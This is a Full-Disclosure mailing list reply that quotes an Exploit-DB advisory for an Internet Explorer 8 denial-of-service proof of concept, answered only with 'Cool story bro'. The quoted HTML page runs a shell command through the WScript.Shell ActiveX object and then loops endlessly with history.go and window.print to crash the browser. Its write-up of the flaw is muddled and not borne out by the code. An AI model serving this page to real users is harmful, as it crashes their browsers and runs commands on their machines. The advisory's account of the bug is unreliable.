information security wrote: > link:http://www.exploit-db.com/exploits/11438 > > > > > # Title: Internet Explorer 8 (Multitudinous looping )Denial of Service > Exploit > # EDB-ID: 11438 > # CVE-ID: () > # OSVDB-ID: () > # Author: Asheesh kumar Mani Tripathi > # Published: 2010-02-13 > # Verified: yes > # Download Exploit Code <http://www.exploit-db.com/download/11438> > # Download N/A > > view source <http://www.exploit-db.com/exploits/11438#viewSource> > print > <http://www.exploit-db.com/exploits/11438#printSource>?<http://www.exploit-db.com/exploits/11438#about> > > ======================================================================= > > Internet Explorer 8 (Multitudinous looping )Denial of > Service Exploit > > ======================================================================= > > by > > Asheesh Kumar Mani Tripathi > > > # code by Asheesh kumar Mani Tripathi > > # email [email protected] > > # company aksitservices > > # Credit by Asheesh Anaconda > > > #Download > http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx > #Greets to Bhudeo Prasad for making shell script :) > > > #Background > > Internet Explorer 8 is a popular internet browser. with lots of bugs .....:) > > #Vulnerability > This bug is a typical result of multitudinous loop. > The flaw exists within "history go" ActiveX control which contains > stack based overflow conditions.User interaction is required to > exploit this vulnerability in that the target must visit a malicious > web page. > > > #Impact > > Attacker Can run any windows command ,consume lots of memory and able to > crash your IE or make > your system unaccessible,your work if any might be lost > > #Proof of concept > copy the code in text file and save as "asheesh.html" open in Internet > Explorer 8 > > ======================================================================================================================== > > asheesh.html > ======================================================================================================================== > <html> > <title>asheesh kumar mani tripathi</title> > > <head> > <script type="text/javascript"> > function sucks() > { > > var shell=new ActiveXObject("WScript.Shell"); > shell.Run("ipconfig", 1); > > } > > function asheesh() > { > sucks(); > window.onerror=new Function("history.go(0)"); > window.print(); > asheesh(); > > > } > asheesh(); > </script> > </head> > <body onLoad="asheesh()"></body> > > </html> > > > ======================================================================================================================== > > > > > #If you have any questions, comments, or concerns, feel free to contact me. > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
Cool story bro _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
